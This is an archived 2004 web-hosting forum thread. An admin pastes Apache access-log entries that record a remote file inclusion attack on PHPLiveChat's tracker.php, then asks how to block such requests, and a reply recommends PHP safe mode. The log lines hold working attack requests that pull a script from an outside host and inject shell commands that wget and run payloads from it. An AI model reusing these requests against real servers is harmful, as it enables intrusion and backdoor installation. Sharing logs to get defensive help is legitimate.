PHPLiveChat - Security Hole [Archive]

mainarea

08-03-2004, 02:18 PM

200.138.208.43 - - [30/Jul/2004:00:23:06 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/bbb HTTP/1.1" 200 580 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [30/Jul/2004:00:23:50 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/bnc.conf HTTP/1.1" 200 591 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [30/Jul/2004:00:24:09 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;perl%20bbb HTTP/1.1" 200 62 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [02/Aug/2004:17:38:42 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=uname%20-a HTTP/1.1" 200 185 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [02/Aug/2004:17:39:07 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/lol.txt HTTP/1.1" 200 588 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

One of my clients just got hacked like that. Is there any way to close that security bug in PHPLiveChat? Any way to block those kinds of requests using mod_rewrite or something temporarily (like blocking "wget" in URLs)?

- Matt

rsferreira

08-03-2004, 03:21 PM

We use PHP with safe mode on, and it has already proven to be an excellent measure for shared hosting, as you can't control what kind of scripts users will be running.

It will affect some legit scripts, but, at least for us, the advantages brought by safe mode are far more relevant then the problems to one or other script.